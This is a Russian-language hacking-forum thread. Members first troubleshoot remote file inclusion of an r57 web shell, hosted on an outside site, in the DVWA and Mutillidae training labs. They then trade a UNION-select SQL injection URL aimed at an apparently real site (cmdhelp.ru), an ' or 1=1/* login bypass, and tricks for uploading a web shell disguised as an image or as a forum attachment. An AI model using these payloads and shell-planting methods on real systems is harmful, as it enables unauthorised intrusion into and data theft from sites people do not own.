У меня в .htaccess записано #php_flag allow_url_include on , ведь так должно быть ? А не работает . Даже не знаю что делать ( Делал и так : HTML: +Q. SQL Injection wont work on PHP version 5.2.6. -A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work. In .htaccess: Replace: <IfModule mod_php5.c> php_flag magic_quotes_gpc off #php_flag allow_url_fopen on #php_flag allow_url_include on </IfModule> With: <IfModule mod_php5.c> magic_quotes_gpc = Off allow_url_fopen = On allow_url_include = On </IfModule> Тоже не помогает.
Это весь код , и этот код лежит в папке fi/source/low.php а просто в папке fi лежит index.php и в нем длиный скрипт и внизу написано include($file); , может одно дополняет другое, я в php не очень силен ) В Mutillidae у меня таже фигня не хочет открываться шелл. Я наверное что то не так сделал но не могу понять что. Если кому не лень скачать себе DVWA и проверить если у него таже фигня ? )
# перед строкой означает начало комментария, то есть твои два правила не действуют. не всегда срабатывает включение в .htaccess и нужно править основной php.ini сервера.
в php.ini записано allow_url_include on. У меня в двух сайтах для тренировок не получается. Наверное я что то не так делаю, может сервер на котором у меня шелл не тот ? сервер - holm.ru Но там же ничего сложного нет просто после = пишешь адресс к шеллу без расширения и все? Если я пишу mysite.ru/shell.php то шелл открывается , значит шелл нормальный. Я все делаю как я описал выше, в чем может быть проблема? Мне вместо шелла выдаются ошибки. Кто то у себя на DVWA пробовал ? работает?
тот php.ini что в папке у тебя не действует из-за того что у «главного» php.ini эти флаги стоят в off, а для вебсервера «главный» приоритетней твоего. это лишь моя теория, может быть дело совсем в другом..
Думаю ты прав потому что в файле php про который я говорил не написано после php точка ini и тип у него "парметры конфигурации" и в нем записано ; This file attempts to overwrite the original php.ini file. Doesnt always work. Дело в том что я не нашел другого php.ini , как я посмотрел там его просто нет. Не подскажешь случайно где его найти или надо свой создать? И если создавать то что в него вписать надо? Извеняюсь за столько вопросов , если засоряю тему , просто очень хочеться чтобы у меня получилась php injection. Спасибо за ответы.
Чакэ, вообще должно быть наоборот) иначе просто незачем было бы вводить эти дериктивы в .htaccess если php.ini все равно делает по своему. NZT, у тебя не получается просто потому что ты делаешь не правильно. Ты пытаешься заинклудить http://msp.hut4.ru/r57shell а его у тебя на хостинге нет, даже если будешь вводить http://msp.hut4.ru/r57shell.php то тоже ничего не получится, ибо отдать тебе будет не сам php код шела а уже сгенерированный html. Тут выше уже писали, http://msp.hut4.ru/r57shell.txt должен прокатить, только предварительно залей этот файл.
C .txt? тоже ничего не получается. Я залил shell.php и shell.txt в папку www, туда их надо заливать? И почему shell.php не будет работать , вот зайди http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt , все работает , или то что мне показывает это сгенерированый html? Я скорее всего не правильно заливаю на сервер как ты говоришь. Я заливаю через total commander в папку www сайта. А как надо? И спасибо тебе за желание помочь.
php на сервере интерпретируется (если там конечно есть поддержка php) , и отдает на уже ответ а не исходник самого шела, ты же когда инклудишь тебе нужен именно код, почитай http://php.su/functions/?include так и нужно, тогда нужно искать проблему с конфигурацией сервера, сервер после изменений в php.ini перезагружал ? В .htaccess коментарии поубирал как и говорилось выше ?
Вставлю и я свои 3 копейки http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+union+select+SCHEMA_NAME+from+information_schema.SCHEMATA' Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает. Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так: http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+union+select+CHAR(46)' Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.
Когда пишу точку, говорит: Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19 Без точки нормально все получается, имею ввиду не конкретно этот запрос.
это не на точку ругается. ты не туда смотришь.. HTML: http://www.cmdhelp.ru/index.php?cmd='+union+select+concat_ws(0x3a,table_schema,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1--+ далее 44 раза инкрементишь цифру 0. ну ты понел.. и ещё кажется там lfi
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал Почему названия столбцов разделяются двоеточием, а не запятой? Вы сами пробовали этот код?
Примерно таким: $mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'"; Тогда при вставке твоего кода получается: $mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."'; То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.
есть где почитать подробнее про заливку шела через картинку? просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны. переименовал шелл в шелл.пхп.жпг, получил в аватарку себе - жду советов
Justonline Возможно ты залил картинку,посмотри firebug'ом или в исходном коде путь картинки и запускай шелл. PS:Народ форум IPB,можно ли через attachments как нибудь залить шелл?Мне просто интересно,доступно прикрепление файлов всех форматов,а вот по ссылке предлагает скачать..как узнать где хранится прикрепленный файл на сервере форума именно в том формате какой я залил? Или это не работает? Установить форум и проверить нет возможности,поэтому прошу знатоков)
